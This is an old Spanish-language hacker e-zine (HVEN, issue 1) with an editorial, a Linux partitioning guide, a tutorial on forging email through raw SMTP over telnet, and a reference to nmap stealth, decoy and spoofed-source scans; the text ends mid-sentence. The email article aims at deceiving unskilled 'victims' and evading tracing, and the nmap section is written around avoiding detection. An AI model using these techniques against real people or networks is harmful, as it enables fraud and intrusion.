ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» 
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹  °±²Û HVen  E-Zine Û²±°  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
º                       ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ                       º
º                                                                            º
º                            Ü  Ü  Ü Ü  ÜÜÜ  ÜÜÜÜ                            º
º                            ÛÜÜÛ  Û Û  ÛÜÜ   Û Û                            º
º                            Û  Û  ßÜß  ÛÜÜ   Û Û                            º
º                                                                            º
º                                 ~~0  |_)                                   º
º                                |(_~|^~~|                                   º
º                                 TT/_ T"T                                   º
º                             ^^^^^^^^^^^^^^^^^                              º
º                        El Primer E-Zine Venezolano                         º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹  Disclaimer  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º El contenido de esta revista electr¢nica tiene una unica finalidad,  la de º
º educar con respecto a  seguridad  inform tica y que  posibildades  tenemos º
º para quebrar dicha seguridad, asi como tambi‚n hablamos sobre otros temas, º
º especialmente  temas  underground,  ni el equipo  HVEN ni  ninguno de  sus º
º colaboradores se hace responsable de  lo que tu hagas con esta informaci¢n º
º desde ahora solo tu eres responsable de tus actos...  ¨ok?                 º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹  Powered by Edit del DOS  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹

                              P gina Oficial
          ÍÍÍÍÍÍ>>  http://members.xoom.com/kliber/hack  <<ÍÍÍÍÍÍ
           ÍÍÍÍÍÍ>>  http://www.hackhour.com.br/hven  <<ÍÍÍÍÍÍ

                               Canal Oficial
            ÍÍÍÍÍÍ>>  #Hackers-Venezuela (irc.dal.net)  <<ÍÍÍÍÍÍ
                          El Conocimiento es Poder

                        ÍÍÍÍÍÍ>>  Staff  <<ÍÍÍÍÍÍ

            DarKdEaTH                             
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DoctorX                               
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            DunkelSeite                           
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Kliber                                
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
            Teken Melocotoff                      
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


                     Env¡a tus sugerencias y/o art¡culos a
                              <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
                            
   ÉÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹ Contenido ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍͼ

01  Editorial....................................................DarKdEaTH

02  Instalando Linux, Particiones y Otras Cosas....................DoctorX

03  Como Crear Correo Electronico Falso...................Teken Melocotoff

04  Nmap al Desnudo................................................DoctorX

05  IPSpoofing & Sniffers.............................................Kimo

06  Seguridad en Windows NT.........................................Kliber

07  UNIX, Como usarlo y vivir para contarlo.........................Kliber

08  Clonaci¢n y Telefon¡a Celular......................VeN tHe KiLlEr RaT!

09  Programaci¢n del Shell de Unix.................................DoctorX
 
10  An lisis del John The Ripper 1.6.............................DarKdEaTH

12  Como arreglar las baterias de lo celulares.....................KaDiLaC

13  Guia de Programaci¢n Batch.......................................MHVSS

14  Despedida....................................................DarKdEaTH

   ÉÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹ Editorial ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹DarKdEaTHÌÍÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍͼ

  Al  f¡n  nos decidimos a realizar esta revista  electr¢nica, el  primer
  E-zine Venezolano, idea que daba vueltas desde hace  tiempo y ahora  se
  consolida esperemos siga  fuerte  esta  idea, desde  ahora comienza una
  nueva  era  del  hack en  Venezuela, y esperamos que  con  esto  surjan
  iniciativas en otros grupos de hack en Venezuela  ya  que grupos serios
  se ven pocos :(.

  Venezuela desde hace alg£n tiempo se ha visto  sumergida en una intensa
  crisis  en  todos los  aspectos,  despu‚s de tanto tiempo parece que lo
  malo est  llegando a su fin, la econom¡a parece fortalecerse,  y poco a
  poco (eso si! muuuy poco a poco) se est n viendo los resultados  de  un
  presidente  golpista  jeje,  no me cae muy bien que digamos pero si  le
  est  echando bolas entonces estamos en el mismo bando ;).

  Tambi‚n queremos invitar a quien quiera  colaborar  con  este  proyecto 
  pueden enviar sus articulos y/o comentarios, pues aqui estamos tratando
  de mejorar cada dia mas, y hacer  un  llamado a los hackers venezolanos 
  para que se manifiesten  y  dejen  un  poco el under y salgan, claro no 
  mucho ;).

  Hemos decidido que el  castellano es  un  idioma muy perfecto como para 
  hacer la maldad  de no poner acentos ni e¤es, claro no somos educadores 
  ni nada de eso, as¡ que se nos puede pasar de vez en cuando alg£n error
  ( a veces muy de vez en cuando ;) pero si pensamos que as¡ es el idioma
  y no  somos nadie para cambiarlo as¡ que ya sabes, si quieres leer este
  ezine  con  tu wordpad  o  lo  que  sea  olvidalo,  usa el edit del dos
  (recomendado) para leer el ezine.
  
  Bueno, no sigo hablando paja y ahi les dejo nuestro primer  n£mero, que
  lo disfruten...

   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Instalando Linux, Particiones y Otras Cosas  ÌÍÍÍÍÍÍÍÍÍÍÍÍ͹DoctorXÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

      Linux es un Sistema operativo muy versatil y que tiene la ventaja de
  tener  el apoyo de un gran numero de programadores alrededor  del  mundo 
  para el desarrollo  de software los cuales  en  algunos  casos  trabajan
  gratis   lo cual  ha permitido que sea el SO que se  ha desarrolado  con
  mayor  informaci¢n en  la  historia  de  la Informatica,  pasando de ser
  utilizado  por  un  7%  de  los  usuarios de Computadoras en el Mundo en
  el 97 a un 18% en el 98, lo  cual  muestra  como  ha  se  ha ido ganando
  adeptos  debido  a  sus multiples funciones y fortaleza aunque sin perder 
  lo  oscuro  de  un sistema  unix  por  lo  cual a veces  configurar  una
  distribucion de Linux no es tarea facil.
  
      Para iniciar  la  instalacion de  Linux primero necesitas elegir una
  distribucion,    existen  5  distribuciones  que  a  mi juicio  son  las
  mas utilizadas:

  Red Hat  Linux: Una verdadera obra de arte  y  muy facil  de   instalar,
  ademas  de ser en  la actualidad el  mas  popular  en  U.S.A  ademas que
  por experiencia te  digo  que es mas facil de configurar que  cualquiera
  de  las   otras  y  la  instalaci¢n  de  nuevo  software  es  mucho  mas
  facil y rapida en estos menesteres. 
  
  Slackware Linux:  Esta  tambi‚n  es   una  muy  buena  distribuci¢n,  un
  poco oscura en su manejo en  cuanto  configuraci¢n de hardware  y  demas
  pero   tambien   a   mi   juicio   la  mas  apropiada  para  el   hacking
  particularmente yo me cambie de Red Hat a slackware y creo que me  quedo, 
  tiene  muchas aplicaciones  interesantes  y  la instalaci¢n  es  un  poco
  tediosa ya que debes indicar uno a uno los paquetes  a  instalar  a menos
  que  le  des instalar todo,  si decides instalar todo entonces te aseguro
  que te  saturara  el  disco duro con unos 500 megas de donde tal vez unos
  80 o 100  no utilizaras entre servidores de noticias y otras cosas.
 
  S.U.S.E:   Esta  distribucion de  linux  alemana posee  dos versiones una
  para alemania y otra  en ingles para el resto del Mundo, se dice que esta
  distribucion es ideal para principiantes pero a mi juicio esta distribuci¢n
  tiene muy poco software disponible  en comparaci¢n con el  Slackware o el 
  Red  Hat aunque si la tienes a la mano no cuesta nada probar.
 
  Open Lite Caldera Linux:  El  linux en espa¤ol, tiene comandos en espa¤ol
  al igual que las ayudas o sea que mejor imposible si deseas iniciarte. 

  Debian Linux : Esta  es  una de las  distribuciones  mas  recientes,  que
  promete ser muy buena ademas de que posee  su  manejador  de  paquetes de
  instalaci¢n al estilo de Red Hat y con la  salvedad  de que es mas barato
  que muchas otras y mas facil de adquirir.

      Desde  ahora  en  adelante  describir‚  el  metodo  de instalaci¢n de
  Slackware Linux que es muy similar al Red Hat pero con la  diferencias de
  que con Red Hat necesitas un solo disco para instalaci¢n. El Linux necesita 
  una partici¢n en la cual recidir la cual es la Partici¢n  Nativa de Linux 
  que reconocida con el tipo 83  por el fdisk en linux,  en  esta particion
  recidira linux y sus componentes, ademas de esta partici¢n linux necesita
  una particion swap o de intercambio que hace las  veces  de una extensi¢n
  de la memoria RAM de la maquina y que es necesaria si  la maquina tiene 8 
  megas de RAM o menos, al contrario de slackware en el cual dicha partici¢n 
  es  opcional  mientras que  en RED HAT es obligatoria.
  
      Para crear dichas particiones  primero debes hacer espacio para ellas 
  y determinar el tama¤o de las  mismas,  si  tienes  actualmente  una sola
  partici¢n en el disco duro y no deseas perder tus datos entonces la opci¢n 
  para  hacer  el  espacio  es FIPS o PARTITION MAGIC  ambos   programas se  
  encuentran  en  internet   aunque el FIPS muchas veces viene  en los cd's
  de Linux,   dichos programas  te  permiten re-particionar  el  disco duro
  sin perder los datos que tenias  antes solo jugando  con el espacio libre
  disponible.  Si  no dispones de estos programas  y  no  te  importa  como 
  a  mi perder algo del win entonces tienes  dos opciones una  el fdisk del
  DOS y otra el fdisk de linux, lo mejor que puedes hacer es primero dividir
  el disco duro en dos con el fdisk del DOS y crear una  particion primaria
  del DOS  en la  que  recidira  el WIN9X o el  2000  cuando  este, una vez
  creadas dichas particiones entonces desde el msdos procedes a la creacion
  de los discos boot y root que son necesarios para la  instalacion y  para 
  ello utilizas el rawrite  en  msdos, antes  de crear dichos  discos debes
  determinar que imagen  utilizaras en la instalaci¢n  tanto  para  el boot
  como para el root, las  imagenes  son el  kernel y  el  soporte  para  el
  hardware de tu PC por eso si tienes dispositivos scsi es distinta a si no
  los tienes por eso debes leer el README que aparece adjunto a los archivos
  de las imagenes en mi caso para el boot tome la imagen bare.i  y  para el
  root tome la color.i qu e son las  que  tienen  el  soporte mas  generico
  ademas de  tener  controladores  para  cd  IDE/ATAPI que es el que tengo ,
  ademas  la instalcion en mi  caso es  desde  un cd pero se puede instalar
  desde el disco duro previo a haber bajado el linux o desde ftp en una red,
  usted elije el de su preferencia de acuerdo al  tipo de instalaci¢n.

  Como Crear el Disco Boot y Root ??????

      Una vez que hemos elegido las im genes desde msdos y con dos discos
  31/2 utilizamos el rawrite de esta forma :
 
  > rawrite  enter
 
  luego el  les  pedira  el  nombre de la  imagen y su  ubicaci¢n y le  dan
  enter (por  supuesto que despues  de  haber respondido), seguidamente les
  pedira el  drive   en  el  que  crear n  la  imagen y  alli  colocan  a: 
  esto lo repiten dos veces con el boot y  el  root  a  menos que esten en
  Red Hat y solo necesitan el boot para instalar de cd's.

  Una  vez  hecho  esto  deben  cambiar el  setup de la  maquina  para  que
  arranque  desde disco 3 1/2  y  re-arrancar  la  maquina. Al Reiniciar la
  maquina con  el disco  boot primero veran como se carga el kernel de linux
  desde el disco  y  veran  aparecer  un  mensaje  en  la pantalla diciendo
  "Instalacion  de  Slackware 3.6 " o   algo  asi, imagino  que   en  otras
  distribuciones es parecido  al  menos  en  red hat lo es,  una vez en ese
  punto les saldra un prompt diciendo " boot:" esperando alguna instruccion
  que pueda  ser  necesaria  para  un  tipo  particular  de  arranque si el
  necesario o a veces para indicarle desde  donde arrancar en  nuestro caso
  simplemente con pulsar enter basta, a partir de alli se inicia la carga de
  linux y le sera solicitado el disco root y una vez que lo introduzca dicho
  disco lo proximo sera un mensaje pidiendo el "login:" que es el nombre de
  usuario en el sistema pero en este sera root.  Una vez hecho esto tendras
  el prompt del  sistema a  tu  disposici¢n  para crear las  particiones de
  linux si ya no las tienes .
 
  Crear Particiones con el fdisk del Linux.
 
  en el prompt debes escribir
  # fdisk  enter
  y luego le das  la opcion "m" y enter para ver la ayuda del fdisk

  en las opciones tendras
  d - borra una partici¢n
  l  - te dice todos los tipos de partici¢n reconocidos por el kernel
  q - sale sin guardar los cambios
  p - imprime la tabla de particiones en pantalla
  w - sale guardando los cambios
  t  - cambia el tipo de partici¢n (los tipos son los mostrados con l )
  n - crea una nueva particion
  m - muestra el men£ de opciones
 
  ok
  en este punto le damos n
  y te pregunta el numero de la particion que vas a crear
  ya que el linux renoce la particiones asi
  /dev/hda   es un disco duro
  /dev/hda1  partici¢n 1 en el disco duro hda , en este  nuestro caso  esa
  es la partici¢n de dos o de win
 
  /dev/hda2 3,4  y etc estan disponibles para linux
  
  entonces le puedes dar  2
 
  una  vez  hecho  esto  te pedira  el  numero del primer cilindro de esta
  particion y  te  sugerira uno  por  defecto  mostrado  asi " [ 524 ] " o
  el que sea, aca le puedes dar simplemente enter ya que ese  es el primer
  cilindro  disponible, luego te pedira el cilindro en el cual terminara o
  en su defecto  el tama¤o en  megabytes  por   lo cual  puedes decidir en
  darle 100,200,300,1200 o la cantidad de megas que quieras te aconsejo mas
  de 400 para que no te falte espacio si estas creando la native o principal,
  el mismo procedimiento lo repites  con la swap pero luego de creadas las 
  particiones debes decirle a  linux  quien  es  quien o sea asignarles el
  identificador para la swap el 83 y la nativa el 82, eso se  hace  con la
  opcion t del menu y luego w para grabar .
 
     Despues  de creadas las particiones solo te queda instalar linux  si
  estas en slackware le das  "setup "  enter  y se inicia  la  instalaci¢n
  desde alli en adelante debes comenzar a elegir el tipo de  instalaci¢n y
  que quieres instalar, si es en Red Hat alli la instalaci¢n es guiada  de
  manera  intuitiva   a  travez  de  menus  que  te  permiten ir  haciendo
  todo lo necesario desde crear particiones de disco y demas por lo que la
  instalaci¢n de este es m s facil,  volviendo al slackware debes crear un
  disco boot  por si quieres arrancar el linux en vez del win y no  tienes 
  LILO (Linux Loader) que es un programa que te permite elegir entre linux
  y el resto  de sistemas operativos que tengas instalados en el arranque.
  Si es tu primera vez te sugiero que dejes que lilo se instale solo en el
  modo "newbie" y el detectara que tienes win por ejemplo y linux , por lo
  que te colocara un  menu  que  contenga  los dos  para  que decidas cual
  arrancar.

      En la Instalacion del Slackware debes decirle desde donde se instala
  si desde el CD o desde ftp y ademas decirle en donde se instalara por lo
  que alli debes colocar "/" que es la  raiz   o  lo  que  en  analogo  en
  msdos "c:\",  al  elegir  esto solo te falta comenzar la instalacion  de 
  Linux.

  algunos web site de las distribuciones de Linux.

http://www.redhat.com  Red Hat Linux
http://slackware.org      Slackware Linux
http://www.suse.com     S.U.S.E

  otros sites de Linux.

http://linux.ncc.org.ve
http://linux.box.sk
http://linux.org
http://bactery.8m.com  : )
http://linux.org.ve


bueno espero que esta guia les sirva de algo cualquier problema pueden
contactarme
via  email.

   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹ Como Crear Correo Electr¢nico Falso  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹Teken MelocotoffÌÍÍÍÍ 
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

  La creaci¢n de los correos falsos es una cosa muy simple... y por lo usual
  se aprende en tan siquiera en unos minutos. Pero les advierto que las cosas
  si se hacen apresuradamente en las mayoria de los casos o no le sale bien
  o es un completo fracaso. Parte de la creaci¢n de sus correos electr¢nicos
  consta de una buena investigaci¢n. Bueno ya se acabo la mariconada.
 
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
YA TODOS SABEN QUE LO ESCRITO AQUI ES SOLO PARA USO EDUCACIONAL....BLA BLA
BLA.....Y SI SE METEN EN PROBLEMAS NO ME PUEDEN CULPAR NI A MI NI AL QUE
LE DIO ESTE DOCUMENTO BLA BLA BLA....ASI QUE NO JODAN!
-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-

  Ahora bien la creaci¢n de estos documentos requiere de tres cosas:
  1. Investigaci¢n de el servidor de donde quieren que provenga el correo
  2. Investigaci¢n de el servidor de correo de la victima.
  3. Investigaci¢n de los conocimientos de la victima.

  PASO UNO:

  Antes que todo tenemos que investigar el servidor donde queremos que
  provenga el correo. Pero como hacemos esto? No se preocupen todo esto
  se puede realizar desde un mismo programa...sin importar el sistema
  operativo (aunque aquellos hechos en u*nix pueden ser mas complicados
  pero mucho mas convincentes...). Este programa se llama telnet. Lo que
  haremos es conectarnos atravez de telnet a un servicio whois. El servicio
  whois le permite a la persona conocer mas sobre los isp...o proveedor de
  servicio de internet. Como? Al conectarse al servicio whois este le tira
  primero mucha informacion sobre el servio bla bla bla...  por ejemplo
  usemos el servicio whois de internic....que es la compa¤ia que registra
  TODOS los servidores CIVILES de internet....asi que es un whois muy
  completo.

internic>:

  algo asi es el prompt. ahi escribes whois el-domain-del-servidor-que-quieres
  -investigar.(el domain es lo que esta detras de la @ en las direcciones de
  email) seria algo asi

internic>: whois lo-que-esta-detras-de-la-@

  Despues de eso o te dice que no existe..   o te tira muuuuuucha
  informacion muy util sobre el isp. Pero para nuestra aventura solo nos
  interesa lo que viene al final.

ns(un numero cualquiera).unnombre.net/com

  este es el formato mas comun (hay excepciones). Esto te dice lo siguiente.
  Ns (un numero) ns representa name server... o servidor de nombre... y el
  numero el numero del servidor. usualmente vienen en pareja ns1 el servidor
  principal y ns2 usualmente el que se dedica a los correos (en algunos casos
  puedan que hayan mas).

  bien hemos terminado esta parte de la investigaci¢n. ahora falta investigar
  el servidor directamente. Como?

  1. Activen telnet.
  2. En conectar selecionen conectar a sistema remoto
  3. Donde dice host coloquen uno de los nombres de servidor
  4. Donde dice telnet pongan 25 (el default para smtp aunque hay excepciones)
  5. Conectar
  (en algunos casos talvez te veas escribiendo pero no sale nada. Si es asi ve
  a terminal y seleciona preferencias y ahi seleciona eco local)

  Dependiendo si escribieron todo bien, o si el servidor tiene el puerto
  abierto le puede dar respuestas differentes. Si todo ta bien te tira una
  linea con la informacion del servidor y la del programa de smtp (simple
  mail transfer protocol). Si algo sale mal no te dice nada o simplemente
  te dice que no encuentra el servidor.
  Una vez tenida la conexi¢n lo mas inteligente seria accesar el help del
  programa. Como es un programa basado
  en unix hacemos esto:

help
man
?

  estos son differentes comandos de ayuda.
  una vez encontrada la ayuda (si existe) experimente usando el comando de
  ayuda con los comandos para conseguir mas informaci¢n.
  la mayoria de los formatos es este
  helo pon.cualquier.domain.aqui.no.importa.com
  helo... blablabla.. (en este punto el programa te indentifica...
  completamente...). aqui se llega al la parte principal del correo... la
  parte fake. Pero para asegurarnos que funcione bien lo mejor seria mandar
  uno de practica a tu correo.

mail from: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
sender ok
rcpt to: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
recepient ok
(debe ser una direccion valida si no de que sirve?)
data
blblblalblalbalalba......when the message is ready end with a . on line by
itself.
.
message is ready to be sent.

  y ya. has escrito tu primer fakemail.

  ahora deberias haber recibido tu mensaje de prueba tras unos minutos.
  Revisalo. Si puedes poner header completo ponlo. Si con el header simple
  se ve bien... vas por buen camino...  Pero tambien fijate el los headers
  completo...    tal vez tenga un numero de id del mensaje...y eso esta bien..
  es parte del cada mensaje que se manda legal o ilegal... pero si el header
  te delata con palabras buscate otro. Practica y perfeciona tu tecnica. Te
  dara cuenta que en la mayoria de los caso si cometes un error te manda un
  garabato....   asi que ya sabes...  planea bien tu mensaje para no cometer
  errores.

  PASO DOS:

  investigar el correo de tu victima. si tu victima tiene su correo con en
  servicio de correo como hotmail,  mixmail,  etc..   consigue una cuenta
  (la mayoria son GRATIS) y mandate un mensaje a ver como reacciona. Si no
  utilza esto metodos y tienen software dedicado a la lectura de correos..
  trata de investigar de que tan buenos son..
  por ejemplo pine y eudora son muy buenos.......y hasta en algunos casos
  ellos mismos te delatan.

  PASO TRES:
 
  Investiga a tu victima. Averigua que tanto sabe de computadoras. Si
  intentas esto con un hacker o un administrador o alguien que se dedica
  a conocer como funciona las computadoras...   va a ser muy dificil que los
  enga¤es con un fakemail.
  Si es un wannabe o un lamer o un alguien que usa los programas pero no
  sabe ni mierda de como funciona puedes esperar que tu correo sea un exito.
  Asi que sal y explora. Con suficiente practica te daras cuenta de como
  crear los headers falsos desde tu propia  PUTAdora....y hasta pasar el
  mensaje atravez de varios servidores para asi confudir al que quiera dar
  contigo... no pienses que ya los has aprendido todo...   porque todav¡a
  no haz aprendido como hacer los mensajes falsos completamente indetectable
  (al menos que te metas con un par de paises con fuertes cuerpos de
  investigaciones) asi que sigue aprendiendo.

  Escojamos. Seremos lobo, oveja, o pastor

   ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ÍÍ͹  Nmap al Desnudo  ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹DoctorXÌÍÍÍÍ
   ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

       Nmap es un  programa  que  sirve para  hacer un mapeo de las  redes
  o mejor dicho un "scan" o barrido con el fin  de determinar  informaci¢n
  importante a la hora del hack sobre  determinados hosts, redes  o grupos
  de hosts. Este programa creado por  Fyodor (
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 )  se  ha 
  ganado  mucho adeptos debido a su  versatilidad y facilidad  de  manejo,
  ademas de poder utilizar varios  protocolos como el udp y el tcp.


  Este Programa posee multiples  opciones que pueden ser combinadas  entre
  si a£n sin importar el orden en  que se pases estas opciones en la linea
  de comandos.

  uso de nmap: nmap [Tipo de Scan]  [Opciones] victima(s) o red_victima

  Tipo de Barrido o Scan
  ----------------------

   -sT  conexi¢n tcp, este tipo de scan deja ver tu ip.


   -sS  tcp SYN(stealth) o oculto, solo root lo puede ejecutar.


   -sF, -sX, -sN Stealth FIN, Xmas, o Scan Nulo (solo trabaja contra UNIX),
        este tipo de scan se le llama nulo porque intenta molestar lo menos
        posible al "inetd" o demonio de servicios para evitar caer en  el
        en el log del sistema, ademas existen muchos host  con  firewall 
        que poseen filtrado para paquetes del tipo SYN por lo que quedariamos
        automaticamente grabados en el log del sistema,  para esos casos
        es necesario utilizar el sF, sX, sN o el Xmas en vez de el sS.
 

   -sP  ping "scan". Este es utilizado solo para saber  si  determinado(s)
        host(s) estan en ese momento vivos o conectados,  normalmente esto
        lo realiza nmap enviado paquetes a el puerto 80 de un host pero si
        este tiene un filtrado de ese puerto podras ser detectado de todas
        formas puedes utilizar esta opcion en combinacion con -PI para
        cambiar ese puerto 80 por uno mucho mayor preferiblemente.

            
   -sU  Este es un Scan de Puertos abiertos con protocolo UDP, solo root
        puede ajecutarlo.


   -b   ftp "bounce attack" utlizado para ver si se puede utilizar un host
        para pasar una conexi¢n ftp atravez de el y no hacer el ftp a otro
        host desde tu maquina directamente.
        
Nota : 1) si no se le suminstra ning£n tipo de scan se asume por defecto sT. 
       
       2)Ademas  de lo Anterioren el uso de los tipos -sS, Xmas y sF se permite 
       el flag -f para utilizar peque¤os fragmentos en el scan para hacerlos
       menos detectables aun.  


  Opciones (no son Requeridas en algunos casos y pueden ser combinadas)
  --------

   -f   Utiliza  peque¤os paquetes  fragmentados  para el SYN , Xmas , FIN o 
        barrido nulo.


   -P0  No hace "ping" al host en  cuestion , necesario  para  el scan  o
        "barrido" a www.microsoft.com y otros con sistemas de deteccion de
        ataques sensibles asi como los .gov .mil etc.)


   -PT  Utiliza el Ping de tcp para determinar si un host esta  conectado
        para  el caso de -sT y -sP esta opcion aunque  no es suministrada 
        va implicita en  el metodo.


   -PT21 Utiliza el Ping tcp para hacer prueba de conexi¢n a el puerto 21
         o a cualquier otro especificado despues del -PT ejm: -PT110 


   -PI  Utiliza paquetes icmp para determinar que hosts estan conectados
        y es especial si deseas hacer un scan a travez de  un firewall .


   -PB  Hace la misma  funci¢n que  el  barrido (scan) TCP y ICMP, se  le
        puede especificar un puerto destino despues de la "B".


   -PS  Utiliza el TCP SYN sweep en lugar de el valor por defecto que es el
        ack sweep utilizado en el Ping TCP.


   -O   Utiliza el TCP/IP "fingerprinting" para determinar  que  Sistema
        operativo esta corriendo un host remoto.


   -p    o puertos : ejm: '-p 23'  solo  intenta   hacer
        conexi¢n con el(los) host(s) en el puerto especificado para extraer
        de alli la informaci¢n necesaria para la operaci¢n de scan.
        otros ejemplos    '-p 20-100,31330-' hace  un  barrido  entre los
        puertos  20-30  y entre 31330-65535. por defecto  el  barrido  es
        entre los puertos 1 y el 1024 mas los que parezcan en el /etc/services
 

   -Dhost1,host2,ME,host3[,...] Esta opci¢n hace parecer al  host  victima
        que el  scan  est   siendo  realizado por host1,host2,ME(significa 
        nuestro propio host) ,host3 y cuantos unos quiera , por lo cual la 
        victima detectara que el scan proviene de todos esos host y no podra
        determinar  a ciencia cierta quien es el que en realidad esta haciendo
        el scan, el uso de esta opci¢n con  unos 15 hosts puede ocasionar
        un Denial of Service en un Host que este Utilizando un Firewall con
        "Packets Forwarding" o reenvio de paquetes  y  reglas  simples  de
        filtrado, haciendo con que dicho hosts pierda conexi¢n con internet.


   -F   Barrido Rapido a "Fast Scan" solo examina los puertos que estan  en
        el /etc/services.


   -I  Toma informaci¢n de  qui‚n  es el  due¤o del  proceso que  se  esta 
       ejecutando pero solo se puede ejecutar con el -sT por lo cual  deja
       una traza enorme en el log de la v¡ctima por ello debe evitar utili-
       zar esta opci¢n.


   -n  no hace converciones DNS rpara hacer el -sP mas rapido.


   -R  Intenta Convertir utilizando DNS (o sea del ip te muestra el hostname
       ejm: le das 127.0.0.1 y te muestra que s localhost.localdomain.


   -o   guarda el mismo resultado mostrado por pantalla en un
       archivo en formato entendible para los humanos.


   -m   lo mismo que lo anterior pero la salida es en un formato 
        de m quina.


   -i   Lee el(los) ip(s)  de la(s) v¡ctima(s)  desde  un
       archivo.  


   -g   Indica que puerto local se utilizara para enviar
       los paquetes para el scan.


   -S   Si quieres especificar un IP para que sea la fuente del scan,
       ideal para hacer "Scan Spoofing" o encubrir tu scan.


   -v  Verbose. Muestra mas Informaci¢n.


   -h  Muestar la ayuda.  Tambien puedes Visitar http://www.insecure.org/nmap/


   -V  Imprime la version de nmap y sale.


   -e  . Enviar  los paquetes atravez de esta interface 
       en tu host  pueder ser eth0,ppp0,ppp1 etc.

       

    Los host pueden ser especificados con la direcci¢n de internet(IP), con 
    el nombre como por ejemplo : www.microsoft.com o con el nombre o ip del
    host y la mascara que es opcional por ejemplo : www.insecure.org/24 en
    donde /24 para una red de tipo C significa todos los ips de esa red, o 
    tambien 192.32.4.1/24 tendrïa el mismo  efecto,  para  redes  tipo  "B"
    utilice /16 , el /32 hace el scan de un solo host.



Ejemplos :

           supongamos que la victima tiene este ip : 200.12.23.34


     para hacer un scan simple de este host basta con hacer esto:
         
     
     $nmap 200.12.23.34
         
     
     de esta forma el resultado en pantalla sera una lista de los puertos
     en este host que estan abiertos o esperando conexion(listen).
         
     si deseo determinar si ciertos puertos  estan  disponibles  en  la
     victima entonces hacemos esto.

     
     $nmap -p 21,23,110,143 200.12.23.34
     
     
     de esta manera estaremos haciendo el barrido o scan para los puertos 
     de interes en este caso el 21,23,110 y 143.

     si esta vez quiero determinar que SO esta corriendo la v¡ctima la
     opci¢n es hacer esto :
   
      
     #nmap -sS -O 200.12.23.34
     
     
     notese que estoy utilizando la opcion -sS para evitar ser detectado
     al hacer el scan, pero tambien puede funcionar de esta  forma  pero 
     seras autom ticamente registrado en log del sistema v¡ctima :       
     
      
     #nmap -O 200.12.23.34  n¢tese que siempre para utilizar esta opci¢n
                             se debe ser root.
     
     
     para determinar si la v¡ctima es vulnerable al "bounce attack" entonces
     lo utilizamos asi:
  
     
     $nmap -b 200.12.23.34
     
     
     o de esta forma si el host tiene sensibles mecanismos de detecci¢n de
     intrusos.
     
     
     $nmap -P0 -b 200.12.23.34
     
     Estos son solo unos pocos ejemplos pero la combinaci¢n de las opciones 
